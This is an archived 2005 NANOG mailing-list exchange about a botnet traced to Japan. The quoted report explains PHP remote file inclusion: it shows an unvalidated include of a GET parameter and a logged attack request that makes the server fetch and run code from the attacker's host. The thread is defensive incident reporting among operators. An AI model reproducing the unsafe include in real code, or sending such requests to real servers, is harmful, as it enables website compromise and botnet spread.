[87536] in North American Network Operators' Group
RE: Re:Destructive botnet originating from Japan
daemon@ATHENA.MIT.EDU (Hannigan, Martin)
Fri Dec 23 19:54:01 2005
Date: Fri, 23 Dec 2005 19:53:32 -0500
From: "Hannigan, Martin" <hannigan@verisign.com>
To: <nanog@merit.edu>
Errors-To: owner-nanog@merit.edu
This is a multi-part message in MIME format.
------_=_NextPart_001_01C60824.76659E4E
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
You'd think nsp-sec people would try and get nsp-jp involved. Oh, there =
is no nsp-jp, or skooter 15. :)
-----Original Message-----
From: Barrett G. Lyon [mailto:blyon@prolexic.com]
Sent: Fri Dec 23 19:21:47 2005
To: nanog@merit.edu
Subject: Re:Destructive botnet originating from Japan
Well it appears that bad code always seems to be the root of =20
problems, according to our research today the problem appears to be =20
caused by incorrectly written PHP applications that perform includes =20
using a string without running any validation against the string:
index.php?test=3Dtest
$test=3D$_GET[test];
include("$test.php");
When the include executes the test string passed from the GET =20
includes execution instructions:
"GET /index.php?test=3Dhttp%3A//210.170.60.2/....? HTTP/1.0" 200 =
8010 "-" "Wget/1.6"
It appears that the attacker at 210.170.60.2 (also the botnet hosting =20
IRC server) is spreading his code as the include is called, pulling =20
and executing PHP code from a remote server that injects the software.
I'm not sure if this needs to be alerted to anyone outside of this =20
list, but it's pretty nasty.
-Barrett
------_=_NextPart_001_01C60824.76659E4E
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>RE: Re:Destructive botnet originating from Japan</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>
<P><FONT SIZE=3D2>You'd think nsp-sec people would try and get nsp-jp =
involved. Oh, there is no nsp-jp, or skooter 15. :)<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
-----Original Message-----<BR>
From: Barrett G. Lyon [<A =
HREF=3D"mailto:blyon@prolexic.com">mailto:blyon@prolexic.com</A>]<BR>
Sent: Fri Dec 23 19:21:47 2005<BR>
To: nanog@merit.edu<BR>
Subject: Re:Destructive botnet =
originating from Japan<BR>
<BR>
<BR>
Well it appears that bad code always seems to be the root of <BR>
problems, according to our research today the problem appears to =
be <BR>
caused by incorrectly written PHP applications that perform =
includes <BR>
using a string without running any validation against the string:<BR>
<BR>
index.php?test=3Dtest<BR>
$test=3D$_GET[test];<BR>
include("$test.php");<BR>
<BR>
When the include executes the test string passed from the GET <BR>
includes execution instructions:<BR>
<BR>
"GET =
/index.php?test=3Dhttp%3A//210.170.60.2/....? HTTP/1.0" =
200 <BR>
8010 "-" "Wget/1.6"<BR>
<BR>
It appears that the attacker at 210.170.60.2 (also the botnet =
hosting <BR>
IRC server) is spreading his code as the include is called, =
pulling <BR>
and executing PHP code from a remote server that injects the =
software.<BR>
<BR>
I'm not sure if this needs to be alerted to anyone outside of =
this <BR>
list, but it's pretty nasty.<BR>
<BR>
<BR>
-Barrett<BR>
<BR>
<BR>
<BR>
<BR>
<BR>
</FONT>
</P>
</BODY>
</HTML>
------_=_NextPart_001_01C60824.76659E4E--
